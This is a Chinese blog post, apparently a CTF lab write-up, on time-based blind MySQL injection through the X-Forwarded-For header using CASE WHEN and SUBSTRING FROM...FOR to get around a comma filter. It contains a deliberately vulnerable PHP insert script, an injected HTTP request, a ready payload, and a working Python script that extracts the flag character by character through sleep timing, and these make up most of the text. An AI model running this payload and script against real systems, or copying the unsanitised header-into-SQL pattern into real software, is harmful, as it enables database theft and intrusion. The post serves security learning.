MySQL延时盲注：绕过逗号

你的名字 2022-08-28 03:44 216阅读 0赞

# 代码 #

## php ##

<?php
    error_reporting (0);
     
    function getIp(){
        
         $ip = '' ;
    if (isset( $_SERVER ['HTTP_X_FORWARDED_FOR'])){
        
           $ip = $_SERVER ['HTTP_X_FORWARDED_FOR'];
    } else {
        
          $ip = $_SERVER ['REMOTE_ADDR'];
    }
        $ip_arr = explode (',', $ip );
        return $ip_arr [0];
    }
     
    $host = "localhost" ;
    $user = "root" ;
    $pass = "root" ;
    $db = "ctf1" ;
     
    $connect = mysql_connect($host , $user , $pass) or die ("Unable to connect");
     
    mysql_select_db( $db ) or die ("Unable to select database");
     
    $ip = getIp();
    echo 'your ip is :' . $ip ;
    $sql = "insert into client_ip (ip) values ('$ip')" ;
    mysql_query($sql);  
    ?>

# mysql #

CREATE TABLE `client_ip` (
      `id` int(11) NOT NULL AUTO_INCREMENT,
      `ip` varchar(200) DEFAULT NULL,
      PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8, AUTO_INCREMENT=1
    CREATE TABLE `flag` (
      `flag` varchar(32) DEFAULT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
    INSERT INTO `flag` (`flag`) VALUES
    ('327a6c4304ad5938eaf0efb6cc3e53dc');

# 存在延时盲注 #

GET /sql_sleep_union/ HTTP/1.1
    Host: test
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://test/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    x-forwarded-for: 10.20.0.12 '+sleep(5) and '1'='1
    Connection: close

![1][]  
类似这样：

mysql> select 1+sleep(5);
    +------------+
    | 1+sleep(5) |
    +------------+
    |          1 |
    +------------+
    1 row in set (5.00 sec)

![1][1 1]  
不能用逗号，所以用`if`函数了，但是可以使用`case when 条件 then 代码1 else 代码2 end`来判断是否时间等待。

# 绕过逗号，获取数据 #

这里用到了substring，可以从前往后遍历，也可以从后往前遍历，两种方法：

mysql> select substring("123" from 1 for 1);
    +-------------------------------+
    | substring("123" from 1 for 1) |
    +-------------------------------+
    | 1                             |
    +-------------------------------+
    1 row in set (0.00 sec)
    
    mysql> select substring("123" from 1 for 2);
    +-------------------------------+
    | substring("123" from 1 for 2) |
    +-------------------------------+
    | 12                            |
    +-------------------------------+
    1 row in set (0.00 sec)
    
    mysql> select substring("123" from -1);
    +--------------------------+
    | substring("123" from -1) |
    +--------------------------+
    | 3                        |
    +--------------------------+
    1 row in set (0.00 sec)
    
    mysql> select substring("123" from -2);
    +--------------------------+
    | substring("123" from -2) |
    +--------------------------+
    | 23                       |
    +--------------------------+
    1 row in set (0.00 sec)
    mysql> select substring((select flag from flag limit 1) from 1 for 1);
    +---------------------------------------------------------+
    | substring((select flag from flag limit 1) from 1 for 1) |
    +---------------------------------------------------------+
    | 3                                                       |
    +---------------------------------------------------------+
    1 row in set (0.00 sec)
    
    mysql> select substring((select flag from flag limit 1) from 1 for 2);
    +---------------------------------------------------------+
    | substring((select flag from flag limit 1) from 1 for 2) |
    +---------------------------------------------------------+
    | 32                                                      |
    +---------------------------------------------------------+
    1 row in set (0.00 sec)
    
    mysql> select substring((select flag from flag limit 1) from -1);
    +----------------------------------------------------+
    | substring((select flag from flag limit 1) from -1) |
    +----------------------------------------------------+
    | c                                                  |
    +----------------------------------------------------+
    1 row in set (0.00 sec)
    
    mysql> select substring((select flag from flag limit 1) from -2);
    +----------------------------------------------------+
    | substring((select flag from flag limit 1) from -2) |
    +----------------------------------------------------+
    | dc                                                 |
    +----------------------------------------------------+
    1 row in set (0.00 sec)
    mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 3;
    +----------------------------------------------------------------------+
    | (select substring((select flag from flag limit 1) from 1 for 1)) = 3 |
    +----------------------------------------------------------------------+
    |                                                                    1 |
    +----------------------------------------------------------------------+
    1 row in set (0.00 sec)
    
    mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 4;
    +----------------------------------------------------------------------+
    | (select substring((select flag from flag limit 1) from 1 for 1)) = 4 |
    +----------------------------------------------------------------------+
    |                                                                    0 |
    +----------------------------------------------------------------------+
    1 row in set (0.00 sec)
    mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 3 as r;
    +------+
    | r    |
    +------+
    |    1 |
    +------+
    1 row in set (0.00 sec)
    
    mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 4 as r;
    +------+
    | r    |
    +------+
    |    0 |
    +------+
    1 row in set (0.00 sec)
    mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 4 then 1 else 0 end as s;
    +---+
    | s |
    +---+
    | 0 |
    +---+
    1 row in set (0.00 sec)
    
    mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 3 then 1 else 0 end as s;
    +---+
    | s |
    +---+
    | 1 |
    +---+
    1 row in set (0.00 sec)
    mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 3 then sleep(5) else 0 end as s;
    +---+
    | s |
    +---+
    | 0 |
    +---+
    1 row in set (5.00 sec)
    
    mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 4 then sleep(5) else 0 end as s;
    +---+
    | s |
    +---+
    | 0 |
    +---+
    1 row in set (0.00 sec)

# payload #

x-forwarded-for: 10.20.0.12 '+(select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 3 then sleep(5) else 0 end) and '1'='1

# EXP #

import requests
    maystr = "0987654321qwertyuiopasdfghjklzxcvbnm"
    url = "http://test/sql_sleep_union/"
    flag = ""
    for i in range (32):
        for str in maystr:
            headers = {
         "x-forwarded-for" : "127.0.0.1'+" + "(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(6) else sleep(0) end ) and '1'='1" % (i + 1 , str )}
            try :
                res = requests.get(url,headers = headers,timeout = 4 )
            except requests.exceptions.ReadTimeout as e:
                flag = flag + str
                print("flag:", flag)
                break
            except KeyboardInterrupt as e:
                exit(0)
            else :
                pass

![1][1 2]

[1]: /images/20220828/6ae1a06e25094e7e90d4888081101140.png
[1 1]: /images/20220828/8549b944de394142bc389d5dfb488432.png
[1 2]: /images/20220828/0495407ab57e45d1ad55018d5d691ecc.png